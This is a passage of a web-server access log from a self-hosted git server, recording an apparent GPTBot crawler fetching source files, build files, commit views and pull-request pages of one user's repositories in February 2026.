74.7.227.38] [Length 20388] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:46:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20357] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:46:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20393] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:46:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20389] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20390] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20392] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20392] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/models.py?display=source" [Client 74.7.227.38] [Length 13884] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/models.py" +[17/Feb/2026:17:46:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:17:46:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/controller.cpp?display=source" [Client 74.7.227.38] [Length 12247] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/controller.cpp" +[17/Feb/2026:17:46:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13108] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:17:46:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:17:46:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13145] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:17:46:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13145] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:17:46:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/logger.hpp?display=source" [Client 74.7.227.38] [Length 13145] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:17:46:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:17:46:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:17:46:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:17:46:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/fetcher.py?display=source" [Client 74.7.227.38] [Length 19655] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:17:46:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13353] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:17:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11613] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:17:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13313] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:17:46:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11075] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:17:46:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13351] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:17:46:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11046] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:17:46:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13353] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:17:46:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11075] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:17:46:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11617] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:17:46:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11582] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:17:46:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 314600] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.png" +[17/Feb/2026:17:46:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 10989] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:46:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10080] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:46:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:17:46:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11902] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/tsconfig.json" +[17/Feb/2026:17:46:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/status.json?display=source" [Client 74.7.227.38] [Length 11092] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/status.json" +[17/Feb/2026:17:46:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/status.json?display=source" [Client 74.7.227.38] [Length 11093] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/status.json" +[17/Feb/2026:17:46:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11163] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:46:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:17:46:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11036] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:17:46:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:17:46:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14174] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:46:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.ico" +[17/Feb/2026:17:46:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldBar.ico" +[17/Feb/2026:17:46:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.ico" +[17/Feb/2026:17:46:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldBar.ico" +[17/Feb/2026:17:46:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 9792] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.ico" +[17/Feb/2026:17:46:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.ico?display=rendered" [Client 74.7.227.38] [Length 11001] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.ico" +[17/Feb/2026:17:46:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 856] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.ico" +[17/Feb/2026:17:46:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:46:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11184] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:46:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11185] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:46:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:17:46:56 +0000] - 200 